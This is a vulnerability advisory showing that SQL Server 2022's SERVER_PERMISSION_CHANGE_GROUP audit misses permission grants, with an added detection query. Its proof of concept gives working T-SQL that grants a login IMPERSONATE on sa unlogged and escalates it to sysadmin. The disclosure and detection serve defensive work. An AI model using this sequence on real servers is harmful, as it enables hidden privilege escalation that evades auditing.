Title: SQL Server 2022 Security Audit Failure Vulnerability
Product: Microsoft SQL Server
Affected Version(s): 2022 (RTM-CU18) (KB5050771)
Tested Version(s): 2022 (RTM-CU18) (KB5050771)
Fix: This security bug will be fixed in a future cumulative update released by Microsoft
Risk Level: Medium
Author of Advisory: Emad Al-Mousa
Overview:
Native security auditing is an important facility used to track and monitor activities within the database based on pre-defined audit policies. These security audit policies are engineered
by the vendor to capture sensitive actions that can potentially jeopardise your database system.
*****************************************
Vulnerability Details:
In Microsoft SQL Server 2022, when a security audit is configured for "SERVER_PERMISSION_CHANGE_GROUP", the corresponding events do not get recorded in the audit logs as expected and designed!
*****************************************
Proof of Concept (PoC):
I will create a dummy local SQL authentication account and will call it 'TIM':
USE [master]
GO
CREATE LOGIN [TIM] WITH PASSWORD=N'TIM', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
Then, I will create the audit policy as shown below:
USE [master]
GO
CREATE SERVER AUDIT [test-permission-change]
TO FILE
( FILEPATH = N'D:\SQLServer_2022\audit\'
,MAXSIZE = 0 MB
,MAX_ROLLOVER_FILES = 2147483647
,RESERVE_DISK_SPACE = OFF
) WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE, AUDIT_GUID = 'a2d718eb-2588-4d64-b7c9-249441e96d42')
ALTER SERVER AUDIT [test-permission-change] WITH (STATE = ON)
GO
USE [master]
GO
CREATE SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE]
FOR SERVER AUDIT [test-permission-change]
ADD (SERVER_PERMISSION_CHANGE_GROUP)
WITH (STATE = ON)
GO
Per documentation: https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16
SERVER_PERMISSION_CHANGE_GROUP: This event is raised when a GRANT, REVOKE, or DENY is issued for permissions in the server scope.
-- It's expected that the configured security auditing will capture the following T-SQL statement:
GRANT IMPERSONATE ON LOGIN::sa TO TIM
GO
Unfortunately, the above T-SQL command is NOT logged in the audit logs!!
This can be verified by querying audit logs:
SELECT * FROM sys.fn_get_audit_file('D:\SQLServer_2022\audit\*',
DEFAULT,
DEFAULT) order by event_time desc
GO
So a back-door/weakness has now been introduced into the SQL Server instance, and it will not be detected. Database account TIM can now log in and execute the following T-SQL query to escalate its permissions to the SYSADMIN role successfully:
execute as login='sa'
ALTER SERVER ROLE [sysadmin] ADD MEMBER [TIM]
GO
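Since the audit action group does not record the GRANT, a compensating control is to snapshot the server-scope permissions held on logins and diff them on a schedule. The following T-SQL is an added example, not part of the advisory or of Microsoft's tooling; it assumes a DBA utility database named [DBA_Tools], which is a placeholder.

```sql
-- Compensating detection, added here as an example; not part of the advisory.
-- SERVER_PERMISSION_CHANGE_GROUP is shown above not to record the GRANT, so
-- baseline server-scope permissions on logins and report anything new.
-- Assumes a DBA database named [DBA_Tools] (placeholder; adjust as needed).
USE [DBA_Tools];
GO
-- Step 1: capture the current set of server-scope permissions whose
-- securable is a login (class_desc = 'SERVER_PRINCIPAL'). Run once.
IF OBJECT_ID(N'dbo.login_permission_baseline', N'U') IS NULL
BEGIN
    SELECT
        grantee.name     AS grantee_login,
        grantor.name     AS grantor_login,
        target.name      AS target_login,
        p.permission_name,
        p.state_desc,
        SYSUTCDATETIME() AS captured_at_utc
    INTO dbo.login_permission_baseline
    FROM sys.server_permissions AS p
    JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
    JOIN sys.server_principals AS grantor ON grantor.principal_id = p.grantor_principal_id
    JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
    WHERE p.class_desc = N'SERVER_PRINCIPAL';
END
GO
-- Step 2 (run on a schedule): permissions on logins that exist now but were
-- not in the baseline. The advisory's GRANT IMPERSONATE ON LOGIN::sa TO TIM
-- appears here as target_login = 'sa', grantee_login = 'TIM',
-- permission_name = 'IMPERSONATE', state_desc = 'GRANT'.
SELECT
    grantee.name AS grantee_login,
    grantor.name AS grantor_login,
    target.name  AS target_login,
    p.permission_name,
    p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS grantor ON grantor.principal_id = p.grantor_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = N'SERVER_PRINCIPAL'
EXCEPT
SELECT grantee_login, grantor_login, target_login, permission_name, state_desc
FROM dbo.login_permission_baseline;
GO
```

Any row returned by step 2 is a permission change on a login that the audit did not capture; after review, refresh the baseline so the next run reports only further changes.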
*****************************************
References:
https://databasesecurityninja.wordpress.com/2025/04/01/sql-server-vulnerability-audit-failure-for-server_permission_change_group-in-sql-server-2022/
https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16